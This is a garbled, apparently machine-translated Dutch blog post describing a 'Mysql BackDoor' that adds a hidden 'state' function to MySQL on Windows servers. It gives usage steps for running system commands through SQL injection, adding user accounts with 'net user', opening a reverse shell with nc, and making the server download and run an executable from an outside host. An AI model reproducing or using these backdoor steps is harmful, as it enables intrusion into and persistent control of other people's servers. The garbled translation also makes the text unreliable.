Mysql BackDoor
Bron: Puri Manchester
De mysql BackDoor was een achterdeur voor de ontwikkeling van PHP + MySQL-server voor mysql na de achterdeur te installeren toe te voegen "state"-functie kan uitvoeren systeem commando's en beginnen met de Mysql proces op basis van de dll-sniffer soort achterdeur, slim gerealiseerd geen poort, geen proces, geen diensten door de muur van Troje. programma in WINXP WIN2003 + MYSQL5.0.X, en onder pass.
De installatie wordt Mysql.php verspreid naar de PHP-server, volgens het invullen van de Host-User-Password-DB, klik op "auto-installeren Mysql BackDoor"
Na een succesvolle installatie, dan zou Mysql worden verhoogd met een "state"-functie, terwijl de Mysql proces wordt het runnen van een snuiven de achterdeur van deze achterdeur in Windows hetzelfde systeem voorrechten en Mysql heeft.
Het gebruik van state-functies
Staat de functie is eigenlijk een PHP systeem () "functie dezelfde functie kan worden gebruikt om het systeem opdrachten uit te voeren Voer de SQL-opdracht:." Office en vul het mysql statement uit te voeren, zoals "selecteer de staat (" het net user nohack / add "), klik op de" Execute SQL-instructies zal de resultaten uit te voeren.
Met de stand-functie op basis Snuif de achterdeur, ook al WebShell verloren, zolang de server, SQL-injectie punt, kunnen we door middel van injectie. Php? Id = 1 en staat ('net user') "-methode wordt uitgevoerd op de server .? De opdracht Echter, als de injectie punt is het niet we nog steeds noemen Snuif de achterdeur controle-server naar een poort van de server en open naar de Mysql-"het begin van het pakket, kunnen bellen met de de achterdeur, zoals Snif.:
Een draaiend systeem commando: nc van de ip 80 -> Enter -> Mysql-cmd / c het net user abc / add> c :/ log.txt, (Let op: "" de laatste kan niet worden weggelaten)
2 20082 poort van de schelp naar de lokale server bounce: in de eerste run van nc-de LP 20 082 om de machine 20082-poort te controleren, en daarna van de nc ip 80 -> Enter -> Mysql-c -> Enter
Laat de server downloaden: van nc ip 80 -> Enter -> Mysql-http :/ / www.x.com de / door.exe-c mydoor.exe (let op: laatste "Kan niet worden weggelaten)
Naast het sturen van de "Mysql-c-', de andere opdracht is geen echo, maar de overeenkomstige opdrachten op de server.
Verwijder Mysql op de vlucht "drop-functie staat 'kan worden gelost, maar tegelijkertijd zal de mysql proces om af te sluiten, terug te keren naar normaal na reboot.










































158 Trackback (s)
U moet ingelogd om een reactie te plaatsen.